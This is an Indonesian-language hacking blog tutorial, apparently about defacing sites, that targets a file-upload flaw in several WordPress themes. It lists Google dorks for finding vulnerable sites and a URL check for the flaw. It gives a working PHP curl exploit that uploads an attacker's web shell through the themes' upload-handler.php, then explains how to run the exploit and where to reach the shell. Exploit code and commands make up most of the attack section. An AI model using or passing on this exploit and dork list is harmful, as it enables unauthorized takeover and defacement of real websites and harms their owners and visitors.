deface, hacking,
Assalamualaikum , Karena sudah lama tidak share Tutorial karena saya Sekarang Sibuk dalam Bekerja , Kali ini saya dapat Kesempatan Untuk Membuat Tutor lagi :)
Alhamdulillah :D
Oke , tanpa basa-basi , langsung saja .
Pertama , Karena Judulnya orange themes File Upload , Maka ada beberapa Themes yang Sama Vuln dengan itu ,



  • inurl:"/wp-content/themes/bordeaux-theme/"
  • inurl:"/wp-content/themes/bulteno-theme/"
  • inurl:"/wp-content/themes/oxygen-theme/"
  • inurl:"/wp-content/themes/radial-theme/"
  • inurl:"/wp-content/themes/rayoflight-theme/"
  • inurl:"/wp-content/themes/reganto-theme/"
  • inurl:"/wp-content/themes/rockstar-theme/"  
 Sekarang , Gunakan 1 Dork Di atas .
Saya akan mengambil 1 Dork . 
Yaitu :inurl:"/wp-content/themes/bordeaux-theme/"
Lalu , Jika Sudah dapat kan target , ex: www.site.com/wp-content/themes/bordeux-theme/
Anda tambahkan Vuln nya , /functions/upload-handler.php
Maka targetnya akan menjadi www.site.com/wp-content/themes/bordeux-theme/functions/upload-handler.php
Jika Keluar Error maka Site Itu Vuln :D
nah Sebelum mengeksekusikan Target ini , yang anda butuh kan adalah :
  1. Xammp , Anda bisa download XAMMP di google, saya rasa sudah banyak bertebaran , lalu Install .
  2. Jika Sudah , Buka Folder Xammp > terus buka lagi Folder PHP , Dan cari code PHP.INI , Tekan Control + F / CTRL + F , Ketikkan curl Lalu enter , jika ketemu Delete (;) Tanpa tanda kurung () , Lalu Jika tidak menemukan tanda ; ini berarti kamu sudah succes ..
  3. Letakkan Shell Anda di Folder Xammp - Folder PHP , contoh Shell ex : up.php
Jika 3 cara diatas sudah selesai sekarang kita akan Mengeksekusikan Target ..
Copykan Exploit ini 
<?php
$uploadfile="upload.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/rockstar-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Dan Save dengan extention .php , Disini saya akan save dengan File bernama x.php , Simpan di dekat Folder Xammp - Folder PHP ..
Tepat dimana anda letak Shell anda tadi ..
Ingat , nama shell saya ada up.php 
Maka di bagian exploit tadi 

$uploadfile="upload.php"; <-- upload.php rename menjadi up.php 

Jika sudah Save Kembali :))

Sekarang .

Buka Xammp Anda , Disini Jika xammp anda termasuk Versi lama , maka anda harus masuk ke folder xammp nya langsung 

Cara nya 

ketik : cd\ Lalu tekan Enter 
Lalu Jika CMD anda kembali ke System C atau seperti ini
C:\Documents and Settings\Alliance>cd\

C:\>
Maka sudah berhasil , Sekarang selanjutnya tekan cd /xammp/php tekan Enter
Jika Sudah Jlankan Exploitnya , tadi nama Exploit saya adalah x.php maka cara menjalankannya seperti ini ..
cd:\xammp\php\>: php x.php Dan tekan Enter ..
Jika Keluar tulisan nama shell anda di CMD atau Command Promd tadi maka SUCCES xD
Shell acces , www.site.com/wp-content/uploads/2013/11/up.php
Jika masih bingung , Kamu bisa Commentar di blog ini .
:)

Sumber : http://dumaicodes.blogspot.com
 
Top